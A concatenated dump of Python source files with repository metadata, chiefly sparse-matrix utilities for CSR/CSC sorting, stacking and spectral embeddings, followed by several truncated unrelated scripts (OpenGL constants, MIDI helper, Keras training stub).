Nonzero elements in each row of the returned CSR matrix is sorted in an descending order based on the value. If only_topk is given, only topk largest elements will be kept.
Args:
shape (tuple): the shape of the input COO matrix
row_idx (ndarray): row indices of the input COO matrix
col_idx (ndarray): col indices of the input COO matrix
val (ndarray): values of the input COO matrix
only_topk (int, optional): keep only topk elements per row. Default None to ignore
Returns:
csr_matrix
"""
csr = smat.csr_matrix((val, (row_idx, col_idx)), shape=shape)
csr.sort_indices()
for i in range(shape[0]):
rng = slice(csr.indptr[i], csr.indptr[i + 1])
sorted_idx = np.argsort(-csr.data[rng], kind="mergesort")
csr.indices[rng] = csr.indices[rng][sorted_idx]
csr.data[rng] = csr.data[rng][sorted_idx]
if only_topk is not None:
assert isinstance(only_topk, int), f"Wrong type: type(only_topk) = {type(only_topk)}"
only_topk = max(min(1, only_topk), only_topk)
nnz_of_insts = csr.indptr[1:] - csr.indptr[:-1]
row_idx = np.repeat(np.arange(shape[0], dtype=csr.indices.dtype), nnz_of_insts)
selected_idx = (np.arange(len(csr.data)) - csr.indptr[row_idx]) < only_topk
row_idx = row_idx[selected_idx]
col_idx = csr.indices[selected_idx]
val = csr.data[selected_idx]
indptr = np.cumsum(np.bincount(row_idx + 1, minlength=(shape[0] + 1)))
csr = csr_matrix((val, col_idx, indptr), shape=shape, dtype=val.dtype)
return csr
def sorted_csc_from_coo(shape, row_idx, col_idx, val, only_topk=None):
"""Return a column-sorted CSC matrix from a COO sparse matrix.
Nonzero elements in each col of the returned CSC matrix is sorted in an descending order based on the value. If only_topk is given, only topk largest elements will be kept.
Args:
shape (tuple): the shape of the input COO matrix
row_idx (ndarray): row indices of the input COO matrix
col_idx (ndarray): col indices of the input COO matrix
val (ndarray): values of the input COO matrix
only_topk (int, optional): keep only topk elements per col. Default None to ignore
Returns:
csc_matrix
"""
csr = sorted_csr_from_coo(shape[::-1], col_idx, row_idx, val, only_topk=None)
return transpose(csr)
def binarized(X, inplace=False):
"""Binarize a dense/sparse matrix. All nonzero elements become 1.
Args:
X (np.ndarray, spmatrix): input matrix to binarize
inplace (bool, optional): if True do the binarization in-place, else return a copy. Default False
Returns:
binarized X
"""
if not isinstance(X, (np.ndarray, smat.spmatrix)):
raise NotImplementedError(
"this function only support X being np.ndarray or scipy.sparse.spmatrix."
)
if not inplace:
X = X.copy()
if isinstance(X, smat.spmatrix):
X.data[:] = 1
else:
X[:] = 1
return X
def sorted_csr(csr, only_topk=None):
"""Return a copy of input CSR matrix where nonzero elements in each row is sorted in an descending order based on the value.
If `only_topk` is given, only top-k largest elements will be kept.
Args:
csr (csr_matrix): input csr_matrix to sort
only_topk (int, optional): keep only topk elements per row. Default None to ignore
Returns:
csr_matrix
"""
if not isinstance(csr, smat.csr_matrix):
raise ValueError("the input matrix must be a csr_matrix.")
row_idx = np.repeat(np.arange(csr.shape[0], dtype=np.uint32), csr.indptr[1:] - csr.indptr[:-1])
return sorted_csr_from_coo(csr.shape, row_idx, csr.indices, csr.data, only_topk)
def sorted_csc(csc, only_topk=None):
"""Return a copy of input CSC matrix where nonzero elements in each column is sorted in an descending order based on the value.
If `only_topk` is given, only top-k largest elements will be kept.
Args:
csc (csc_matrix): input csc_matrix to sort
only_topk (int, optional): keep only topk elements per col. Default None to ignore
Returns:
csc_matrix
"""
if not isinstance(csc, smat.csc_matrix):
raise ValueError("the input matrix must be a csc_matrix.")
return transpose(sorted_csr(transpose(csc)))
def dense_to_csr(dense, topk=None, batch=None):
"""Memory efficient method to construct a csr_matrix from a dense matrix.
Args:
dense (ndarray): 2-D dense matrix to convert.
topk (int or None, optional): keep topk non-zeros with largest abs value for each row.
Default None to keep everything.
batch (int or None, optional): the batch size for construction.
Default None to use min(dense.shape[0], 10 ** 5).
Returns:
csr_matrix that has topk nnz each row with the same shape as dense.
"""
BATCH_LIMIT = 10 ** 5
if topk is None:
keep_topk = dense.shape[1]
else:
keep_topk = min(dense.shape[1], max(1, int(topk)))
# if batch is given, use input batch size even if input batch > BATCH_LIMIT
if batch is None:
chunk_size = min(dense.shape[0], BATCH_LIMIT)
else:
chunk_size = min(dense.shape[0], max(1, int(batch)))
max_nnz = keep_topk * dense.shape[0]
indptr_dtype = np.int32 if max_nnz < np.iinfo(np.int32).max else np.int64
indices_dtype = np.int32 if dense.shape[1] < np.iinfo(np.int32).max else np.int64
data = np.empty((keep_topk * dense.shape[0],), dtype=dense.dtype)
indices = np.empty((keep_topk * dense.shape[0],), dtype=indices_dtype)
for i in range(0, dense.shape[0], chunk_size):
cur_chunk = dense[i : i + chunk_size, :]
chunk_len = cur_chunk.shape[0]
if keep_topk < dense.shape[1]:
col_indices = np.argpartition(abs(cur_chunk), keep_topk, axis=1)[:, -keep_topk:]
else:
col_indices = np.repeat(np.arange(keep_topk)[np.newaxis, :], chunk_len, axis=0)
row_indices = np.repeat(np.arange(chunk_len)[:, np.newaxis], keep_topk, axis=1)
chunk_data = cur_chunk[row_indices, col_indices]
data[i * keep_topk : i * keep_topk + chunk_data.size] = chunk_data.flatten()
indices[i * keep_topk : i * keep_topk + col_indices.size] = col_indices.flatten()
indptr = np.arange(0, dense.shape[0] * keep_topk + 1, keep_topk, dtype=indptr_dtype)
# Bypass scipy constructor to allow different indices and indptr types
return csr_matrix((data, indices, indptr), shape=dense.shape)
def vstack_csr(matrices, dtype=None):
"""Memory efficient method to stack csr_matrices vertically.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csr_matrix with shape (M1 + M2 + ..., N)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csr_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
nr_cols = matrices[0].shape[1]
if any(mat.shape[1] != nr_cols for mat in matrices):
raise ValueError("Second dim not match")
total_nnz = sum([int(mat.nnz) for mat in matrices])
total_rows = sum([int(mat.shape[0]) for mat in matrices])
# infer result dtypes from inputs
int32max = np.iinfo(np.int32).max
if dtype is None:
dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
indices_dtype = np.int64 if nr_cols > int32max else np.int32
indptr_dtype = np.int64 if total_nnz > int32max else np.int32
indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
indices = np.empty(total_nnz, dtype=indices_dtype)
data = np.empty(total_nnz, dtype=dtype)
indptr[0], cur_nnz, cur_row = 0, 0, 0
for mat in matrices:
indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices
data[cur_nnz : cur_nnz + mat.nnz] = mat.data
# can not merge the following two lines because
# mat.indptr[1:] + cur_nnz may overflow!
indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] = mat.indptr[1:]
indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] += cur_nnz
cur_nnz += mat.nnz
cur_row += mat.shape[0]
return csr_matrix((data, indices, indptr), shape=(total_rows, nr_cols))
def hstack_csr(matrices, dtype=None):
"""Memory efficient method to stack csr_matrices horizontally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csr_matrix with shape (M, N1 + N2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csr_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
nr_rows = matrices[0].shape[0]
if any(mat.shape[0] != nr_rows for mat in matrices):
raise ValueError("First dim not match")
total_nnz = sum([int(mat.nnz) for mat in matrices])
total_cols = sum([int(mat.shape[1]) for mat in matrices])
# infer result dtypes from inputs
int32max = np.iinfo(np.int32).max
if dtype is None:
dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
indices_dtype = np.int64 if nr_rows > int32max else np.int32
indptr_dtype = np.int64 if total_nnz > int32max else np.int32
indptr = np.empty(nr_rows + 1, dtype=indptr_dtype)
indices = np.empty(total_nnz, dtype=indices_dtype)
data = np.empty(total_nnz, dtype=dtype)
indptr[0], cur_ptr = 0, 0
for i in range(nr_rows): # for every row
start_col = 0
for mat in matrices:
cur_nnz = mat.indptr[i + 1] - mat.indptr[i]
indices[cur_ptr : cur_ptr + cur_nnz] = (
mat.indices[mat.indptr[i] : mat.indptr[i + 1]] + start_col
)
data[cur_ptr : cur_ptr + cur_nnz] = mat.data[mat.indptr[i] : mat.indptr[i + 1]]
cur_ptr += cur_nnz
start_col += mat.shape[1]
indptr[i + 1] = cur_ptr
return csr_matrix((data, indices, indptr), shape=(nr_rows, total_cols))
def block_diag_csr(matrices, dtype=None):
"""Memory efficient method to stack csr_matrices block diagonally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csr_matrix with shape (NR1 + NR2 + ..., NC1 + NC2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csr_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
total_nnz = sum([int(mat.nnz) for mat in matrices])
total_rows = sum([int(mat.shape[0]) for mat in matrices])
total_cols = sum([int(mat.shape[1]) for mat in matrices])
# infer result dtypes from inputs
int32max = np.iinfo(np.int32).max
if dtype is None:
dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
indices_dtype = np.int64 if total_rows > int32max else np.int32
indptr_dtype = np.int64 if total_nnz > int32max else np.int32
indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
indices = np.empty(total_nnz, dtype=indices_dtype)
data = np.empty(total_nnz, dtype=dtype)
cur_row, cur_col, cur_nnz = 0, 0, 0
indptr[0] = 0
for mat in matrices:
data[cur_nnz : cur_nnz + mat.nnz] = mat.data
indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices + cur_col
indptr[1 + cur_row : 1 + cur_row + mat.shape[0]] = mat.indptr[1:] + indptr[cur_row]
cur_col += mat.shape[1]
cur_row += mat.shape[0]
cur_nnz += mat.nnz
return csr_matrix((data, indices, indptr), shape=(total_rows, total_cols))
def vstack_csc(matrices, dtype=None):
"""Memory efficient method to stack csc_matrices vertically.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csc_matrix with shape (M1 + M2 + ..., N)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csc_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csc_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
return transpose(hstack_csr([transpose(mat) for mat in matrices], dtype=dtype))
def hstack_csc(matrices, dtype=None):
"""Memory efficient method to stack csc_matrices horizontally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csc_matrix with shape (M, N1 + N2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csc_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csc_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
return transpose(vstack_csr([transpose(mat) for mat in matrices], dtype=dtype))
def block_diag_csc(matrices, dtype=None):
"""Memory efficient method to stack csc_matrices block diagonally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csc_matrix with shape (NR1+ NR2 + ..., NC1 + NC2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csc_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csc_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
return transpose(block_diag_csr([transpose(mat) for mat in matrices], dtype=dtype))
def get_csc_col_nonzero(matrix):
"""Given a matrix, returns the nonzero row ids of each col
The returned ndarray will retain the indices order.
Args:
matrix: the matrix to operate on, with shape (N x M)
Returns:
list of ndarray [a_1, a_2, a_3, ...], where a_i is an array indicate the nonzero row ids of col i
"""
if not isinstance(matrix, smat.csc_matrix):
raise ValueError("matrix need to be csc_matrix!")
return [matrix.indices[matrix.indptr[i] : matrix.indptr[i + 1]] for i in range(matrix.shape[1])]
def get_csr_row_nonzero(matrix):
"""Given a matrix, returns the nonzero col ids of each row
The returned ndarray will retain the indices order.
Args:
matrix: the matrix to operate on, with shape (N x M)
Returns:
list of ndarray [a_1, a_2, a_3, ...], where a_i is an array indicate the nonzero col ids of row i
"""
if not isinstance(matrix, smat.csr_matrix):
raise ValueError("matrix need to be csr_matrix!")
return [matrix.indices[matrix.indptr[i] : matrix.indptr[i + 1]] for i in range(matrix.shape[0])]
def get_row_submatrices(matrices, row_indices):
"""Get the sub-matrices of given matrices by selecting the rows given in row_indices
Args:
matrices (list of csr_matrix or ndarray): the matrices [mat_1, mat_2, ...] to operate on, with shape (M x N1), (M x N2), ...
row_indices (list or ndarray): the row indices to select
Returns:
list of csr_matrix or ndarray
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
n_mat = len(matrices)
if n_mat == 0:
raise ValueError("At least one matrix required as input")
if any(not isinstance(X, (smat.csr_matrix, np.ndarray)) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix or ndarray!")
nr_rows = matrices[0].shape[0]
if any(mat.shape[0] != nr_rows for mat in matrices):
raise ValueError("First dim not match")
if any(idx >= nr_rows or idx < 0 for idx in row_indices):
raise ValueError("row indices should be positive and do not exceed matrix first dimension")
results = []
for mat in matrices:
mat1 = mat[row_indices, :]
if isinstance(mat, smat.csr_matrix):
mat1.sort_indices()
results += [mat1]
return results
def dense_to_coo(dense):
"""Convert a dense matrix to COO format.
Args:
dense (ndarray): input dense matrix
Returns:
coo_matrix
"""
rows = np.arange(dense.shape[0], dtype=np.uint32)
cols = np.arange(dense.shape[1], dtype=np.uint32)
row_idx = np.repeat(rows, np.ones_like(rows) * len(cols)).astype(np.uint32)
col_idx = np.ones((len(rows), 1), dtype=np.uint32).dot(cols.reshape(1, -1)).ravel()
return smat.coo_matrix((dense.ravel(), (row_idx, col_idx)), shape=dense.shape)
def get_relevance_csr(csr, mm=None, dtype=np.float64):
"""Return the csr matrix containing relevance scores based on given prediction csr matrix.
Relevance score is defined as: max_rank - local_rank + 1
Args:
csr (csr_matrix): input CSR matrix, row indices are sorted in descending order
mm (int, optional): max rank, will be inferred from csr if not given
dtype (type, optional): datatype for the returned relevance matrix. Default float64.
Returns:
csr_matrix of relevance scores
"""
if mm is None:
mm = (csr.indptr[1:] - csr.indptr[:-1]).max()
nnz = len(csr.data)
nnz_of_rows = csr.indptr[1:] - csr.indptr[:-1]
row_idx = np.repeat(np.arange(csr.shape[0]), nnz_of_rows)
rel = np.array(
mm - (np.arange(nnz) - csr.indptr[row_idx]), dtype=dtype
) # adding 1 to avoiding zero entries
return smat.csr_matrix((rel, csr.indices, csr.indptr), csr.shape)
def get_sparsified_coo(coo, selected_rows, selected_columns):
"""
Zero out everything not in selected rows and columns.
Args:
coo (coo_matrix): input coo matrix
selected_rows (list of int or np.array(int)): list of rows to be not zeroed out
selected_columns (list of int or np.array(int)): list of columns to be not zeroed out
Returns:
coo matrix with unwanted rows and columns zeroed out.
"""
valid_rows = np.zeros(coo.shape[0], dtype=bool)
valid_cols = np.zeros(coo.shape[1], dtype=bool)
valid_rows[selected_rows] = True
valid_cols[selected_columns] = True
valid_idx = valid_rows[coo.row] & valid_cols[coo.col]
coo = smat.coo_matrix(
(coo.data[valid_idx], (coo.row[valid_idx], coo.col[valid_idx])), shape=coo.shape
)
return coo
def csr_rowwise_mul(A, v):
"""Row-wise multiplication between sparse csr matrix A and dense array v.
Where each row of A is multiplied by the corresponding element in v.
The number of rows of A is same as the length of v.
Args:
A (csr_matrix): The matrix to be multiplied.
v (ndarray): The multiplying vector.
Returns:
Z (csr_matrix): The product of row-wise multiplication of A and v.
"""
if not isinstance(A, smat.csr_matrix):
raise ValueError(f"A must be scipy.sparse.csr_matrix")
if not isinstance(v, np.ndarray):
raise ValueError(f"v must be a numpy ndarray")
if v.ndim != 1:
raise ValueError(f"v should be an 1-d array")
if v.shape[0] != A.shape[0]:
raise ValueError(f"The dimension of v should be the same as the number of rows of A")
Z = A.copy()
for i in range(v.shape[0]):
Z.data[Z.indptr[i] : Z.indptr[i + 1]] *= v[i]
return Z
def csc_colwise_mul(A, v):
"""Column-wise multiplication between sparse csc matrix A and dense array v, where each column of A is multiplied by the corresponding element in v (The number of columns of A is same as the length of v).
Args:
A (csc_matrix): The matrix to be multiplied.
v (ndarray): The multiplying vector.
Returns:
Z (csc_matrix): The product of column-wise multiplication of A and v.
"""
if not isinstance(A, smat.csc_matrix):
raise ValueError(f"A must be scipy.sparse.csc_matrix")
if not isinstance(v, np.ndarray):
raise ValueError(f"v must be a numpy ndarray")
if v.ndim != 1:
raise ValueError(f"v should be an 1-d array")
if v.shape[0] != A.shape[1]:
raise ValueError(f"The dimension of v should be the same as the number of columns of A")
Z = A.copy()
for i in range(v.shape[0]):
Z.data[Z.indptr[i] : Z.indptr[i + 1]] *= v[i]
return Z
def get_cocluster_spectral_embeddings(A, dim=24):
"""Obtain the co-cluster spectral embeddings for the given bipartite graph described in [1]
* [1] `Dhillon, Inderjit S, 2001. Co-clustering documents and words using
bipartite spectral graph partition`
Args:
A (csr_matrix or csc_matrix): bipartite graph matrix
dim (int, optional): the dimension of the returned embeddings. Default 24
Returns:
(row_embedding, col_embedding): a tuple of embeddings for rows and columns respectively
row_embedding: numpy.ndarray of shape (A.shape[0], dim).
col_embedding: numpy.ndarray of shape (A.shape[1], dim).
"""
assert A.min() >= 0.0, "A must be nonnegative"
from sklearn.utils.extmath import randomized_svd
# Obtain An, the normalized adjacency bipartite matrix described in Eq (10) of [1]
# A_n = D_1^{-1/2} A D_2^{-1/2}
# row_diag = diagonal of D_1^{-1/2}
# col_diag = diagonal of D_2^{-1/2}
row_diag = np.asarray(np.sqrt(A.sum(axis=1))).squeeze()
col_diag = np.asarray(np.sqrt(A.sum(axis=0))).squeeze()
row_diag[row_diag == 0] = 1.0
col_diag[col_diag == 0] = 1.0
row_diag = 1.0 / row_diag
col_diag = 1.0 / col_diag
if smat.issparse(A):
n_rows, n_cols = A.shape
r = smat.dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = smat.dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
An = r * A * c
else:
An = row_diag[:, np.newaxis] * A * col_diag
# run SVD on An
nr_discards = 1 # discarding the first component
U, Sigma, VT = randomized_svd(An, dim + nr_discards, random_state=0)
# Normalized the singular vectors based on Eq (24) of [1]
row_embedding = np.ascontiguousarray(row_diag[:, np.newaxis] * U[:, nr_discards:])
col_embedding = np.ascontiguousarray(col_diag[:, np.newaxis] * VT[nr_discards:].T)
return row_embedding, col_embedding
| 38.992408 | 208 | 0.648549 |
c04a299ef4dc134ab3bfdfd03d7e5fd9d275da7c | 1,944 | py | Python | MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 4d6ec0ee9781294c621271a6c045e0b15102bb9b | [
"MIT"
] | 2 | 2021-06-16T07:42:02.000Z | 2021-06-16T09:26:59.000Z | MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 4d6ec0ee9781294c621271a6c045e0b15102bb9b | [
"MIT"
] | 34 | 2021-06-15T09:52:51.000Z | 2021-11-11T13:47:11.000Z | MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 4d6ec0ee9781294c621271a6c045e0b15102bb9b | [
"MIT"
] | 4 | 2021-06-09T06:42:19.000Z | 2021-07-21T08:37:06.000Z | from matchms import utils
| 29.907692 | 89 | 0.598251 |
c04a2a3eb342ba391c15029d393dfe3507aca08e | 2,498 | py | Python | bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 9a3a0c1e30421cd1d66b138ef6a3269ceb6de39f | [
"MIT"
] | null | null | null | bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 9a3a0c1e30421cd1d66b138ef6a3269ceb6de39f | [
"MIT"
] | null | null | null | bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 9a3a0c1e30421cd1d66b138ef6a3269ceb6de39f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding=utf-8
# Copyright 2017-2018 Intel Corporation
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Script to install megadriver symlinks for meson."""
from __future__ import print_function
import argparse
import os
import shutil
if __name__ == '__main__':
main()
| 33.756757 | 82 | 0.67534 |
c04af6a3b44f5f5884d745baba056412e928f38e | 478 | py | Python | python_files/helpers.py | nilamo/pytchie | 2e7a7501f23d393bdb66b64466f62d2ef741b778 | [
"MIT"
] | 10 | 2019-01-21T14:59:39.000Z | 2022-01-25T19:45:57.000Z | python_files/helpers.py | nilamo/pytchie | 2e7a7501f23d393bdb66b64466f62d2ef741b778 | [
"MIT"
] | 6 | 2019-09-26T08:09:41.000Z | 2019-10-22T14:54:19.000Z | python_files/helpers.py | nilamo/pytchie | 2e7a7501f23d393bdb66b64466f62d2ef741b778 | [
"MIT"
] | 3 | 2019-09-27T23:05:39.000Z | 2019-10-22T01:11:06.000Z | #!/usr/bin/env python
import os
import sys
def midi_to_freq(num):
""" Takes a MIDI number and returns a frequency in Hz for corresponding note. """
num_a = num - 69
freq = 440 * 2**(num_a / 12.0)
return freq
if __name__ == '__main__':
print(midi_to_freq(69))
print(midi_to_freq(60))
print(midi_to_freq(105))
| 23.9 | 85 | 0.656904 |
c04af8ddce186b3fd697e8b4010edd2847a07c3a | 2,896 | py | Python | test/integrationMyndFskr.py | redhog/ferenda | 6935e26fdc63adc68b8e852292456b8d9155b1f7 | [
"BSD-2-Clause"
] | 18 | 2015-03-12T17:42:44.000Z | 2021-12-27T10:32:22.000Z | test/integrationMyndFskr.py | redhog/ferenda | 6935e26fdc63adc68b8e852292456b8d9155b1f7 | [
"BSD-2-Clause"
] | 13 | 2016-01-27T10:19:07.000Z | 2021-12-13T20:24:36.000Z | test/integrationMyndFskr.py | redhog/ferenda | 6935e26fdc63adc68b8e852292456b8d9155b1f7 | [
"BSD-2-Clause"
] | 6 | 2016-11-28T15:41:29.000Z | 2022-01-08T11:16:48.000Z | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import *
import os
import sys
import shutil
import inspect
from ferenda import TextReader, util
from ferenda.testutil import RepoTester, file_parametrize
from ferenda.compat import unittest
# SUT
from ferenda.sources.legal.se import myndfskr
file_parametrize(Parse, "test/files/myndfskr", ".txt")
| 39.135135 | 82 | 0.631906 |
c04b151e636326dee485fc70fa9e09aa52af0717 | 2,319 | py | Python | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_NV_geometry_program4'
GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT',0x8DA7)
GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT',0x8CD4)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT',0x8DA9)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT',0x8DA8)
GL_GEOMETRY_INPUT_TYPE_EXT=_C('GL_GEOMETRY_INPUT_TYPE_EXT',0x8DDB)
GL_GEOMETRY_OUTPUT_TYPE_EXT=_C('GL_GEOMETRY_OUTPUT_TYPE_EXT',0x8DDC)
GL_GEOMETRY_PROGRAM_NV=_C('GL_GEOMETRY_PROGRAM_NV',0x8C26)
GL_GEOMETRY_VERTICES_OUT_EXT=_C('GL_GEOMETRY_VERTICES_OUT_EXT',0x8DDA)
GL_LINES_ADJACENCY_EXT=_C('GL_LINES_ADJACENCY_EXT',0x000A)
GL_LINE_STRIP_ADJACENCY_EXT=_C('GL_LINE_STRIP_ADJACENCY_EXT',0x000B)
GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT=_C('GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT',0x8C29)
GL_MAX_PROGRAM_OUTPUT_VERTICES_NV=_C('GL_MAX_PROGRAM_OUTPUT_VERTICES_NV',0x8C27)
GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV=_C('GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV',0x8C28)
GL_PROGRAM_POINT_SIZE_EXT=_C('GL_PROGRAM_POINT_SIZE_EXT',0x8642)
GL_TRIANGLES_ADJACENCY_EXT=_C('GL_TRIANGLES_ADJACENCY_EXT',0x000C)
GL_TRIANGLE_STRIP_ADJACENCY_EXT=_C('GL_TRIANGLE_STRIP_ADJACENCY_EXT',0x000D)
| 55.214286 | 118 | 0.850367 |
c04b8e57191159c1e20db662b36e4eb42827c687 | 2,652 | py | Python | benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | e3cc1a24e877261e90baf781aa67a9d6f6528dac | [
"MIT"
] | 11 | 2017-10-05T08:59:35.000Z | 2021-05-29T01:43:07.000Z | benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | e3cc1a24e877261e90baf781aa67a9d6f6528dac | [
"MIT"
] | 326 | 2016-07-12T08:11:43.000Z | 2022-03-28T07:10:11.000Z | benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | e3cc1a24e877261e90baf781aa67a9d6f6528dac | [
"MIT"
] | 13 | 2016-06-17T12:13:35.000Z | 2022-01-04T16:09:12.000Z | from plumbum import local
import benchbuild as bb
from benchbuild.environments.domain.declarative import ContainerImage
from benchbuild.source import HTTP
from benchbuild.utils.cmd import make, tar
| 36.833333 | 77 | 0.536199 |
c04bfbdd189377e61884680d0c03817aca6a78ee | 1,101 | py | Python | train.py | sazzad/CarND-Behavioral-Cloning-P3 | 46599661bf194cf22683f49cae749eb403aaff01 | [
"MIT"
] | null | null | null | train.py | sazzad/CarND-Behavioral-Cloning-P3 | 46599661bf194cf22683f49cae749eb403aaff01 | [
"MIT"
] | null | null | null | train.py | sazzad/CarND-Behavioral-Cloning-P3 | 46599661bf194cf22683f49cae749eb403aaff01 | [
"MIT"
] | null | null | null | import numpy as np
import csv
import cv2
from keras.models import Sequential
from keras.layers import Dense, Flatten
if __name__ == "__main__":
X_train, y_train = load_data()
train(X_train, y_train) | 28.973684 | 80 | 0.647593 |
c04ce8c06bdc166d9b3b9ffe4880ea147a89ea15 | 3,226 | py | Python | models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | f4503462887d719a39c9ccddd6cc55546e783fd5 | [
"MIT"
] | 2 | 2022-02-08T08:19:59.000Z | 2022-02-17T01:42:54.000Z | models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | f4503462887d719a39c9ccddd6cc55546e783fd5 | [
"MIT"
